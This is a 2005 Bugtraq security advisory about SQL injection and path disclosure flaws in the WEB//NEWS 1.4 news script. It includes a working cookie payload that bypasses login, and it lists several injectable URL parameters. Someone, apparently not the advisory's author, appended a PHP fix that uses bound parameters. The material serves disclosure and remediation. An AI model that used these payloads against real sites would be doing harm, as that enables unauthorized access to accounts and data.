List: bugtraq
Subject: [NewAngels Advisory #5] Stylemotion WEB//NEWS 1.4 Vulnerabilities
From: r.verton () gmail ! com
Date: 2005-09-07 15:49:52
Message-ID: 20050907154952.31448.qmail () securityfocus ! com
[NewAngels Advisory #5] Stylemotion WEB//NEWS 1.4
=============================================================================
Software: WEB//NEWS 1.4
Type: SQL Injections, Path Disclosure
Risk: High
Date: Sep. 1 2005
Vendor: Stylemotion
Credit:
=======
Robin 'onkel_fisch' Verton
http://www.it-security23.net
Description:
============
WEB//News is a news script with CMS-like features.
Vulnerability:
==============
In modules/startup.php:
$_USER=$db->first("SELECT * FROM ".PRE."_user LEFT JOIN ".PRE."_group USING (groupid)
WHERE
( userid='".$_COOKIE['wn_userid']."' AND password='".$_COOKIE['wn_userpw']."' )
LIMIT 1");
As we can see, the $_COOKIE values are concatenated into the query without being checked. Below I've added how
the cookies have to be set to take advantage of this vulnerability (send this to index.php):
wn_userid=1; wn_userpw=0' OR '1'='1
Path Disclosure:
No file in the /actions directory checks whether it is being requested directly instead of being included.
Example:
/actions/cat.add.php?name=A
Almost no REQUEST variable is checked, so several SQL injections are available.
A few examples:
/include_this/news.php?cat=[SQL]
/include_this/news.php?id=[SQL]
/print.php?id=[SQL]
/include_this/news.php?stof=[SQL]
Greets:
==============
Whole NewAngel Team, CyberDead, Modhacker, deluxe
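
A hardened form of the modules/startup.php lookup quoted above, as an added example that is not part of the advisory or of WEB//NEWS. It assumes a PDO connection in place of the script's $db object, a numeric userid, and the placeholder table prefix "wn"; load_user is a hypothetical helper name. The same bound-parameter pattern applies to the cat, id and stof request variables listed above.

```php
<?php
// Added example, not WEB//NEWS code. Assumes PDO (with the SQLite driver for
// the demo) and the table/column names visible in the advisory's query.

function load_user(PDO $pdo, string $prefix, array $cookies): ?array
{
    // A table prefix is an identifier and cannot be bound, so allow-list it.
    if (!preg_match('/^[A-Za-z0-9]+$/', $prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }
    $uid = $cookies['wn_userid'] ?? '';
    $pw  = $cookies['wn_userpw'] ?? '';
    // Assumption: userid is numeric. Reject arrays and non-digit strings early.
    if (!is_string($uid) || !ctype_digit($uid) || !is_string($pw)) {
        return null;
    }
    // Cookie values travel as bound parameters, never as SQL text.
    $stmt = $pdo->prepare(
        "SELECT * FROM {$prefix}_user LEFT JOIN {$prefix}_group USING (groupid)
         WHERE userid = :uid AND password = :pw LIMIT 1"
    );
    $stmt->execute([':uid' => (int)$uid, ':pw' => $pw]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE wn_group (groupid INTEGER, groupname TEXT)");
$pdo->exec("CREATE TABLE wn_user (userid INTEGER, groupid INTEGER, password TEXT)");
$pdo->exec("INSERT INTO wn_group VALUES (1, 'admin')");
$pdo->exec("INSERT INTO wn_user VALUES (1, 1, 'constructed-hash')");

// The cookie value from the advisory is now compared as a literal string,
// so it matches no row; only the stored value authenticates.
$forged = load_user($pdo, 'wn', ['wn_userid' => '1', 'wn_userpw' => "0' OR '1'='1"]);
$valid  = load_user($pdo, 'wn', ['wn_userid' => '1', 'wn_userpw' => 'constructed-hash']);
var_dump($forged === null, $valid !== null);
```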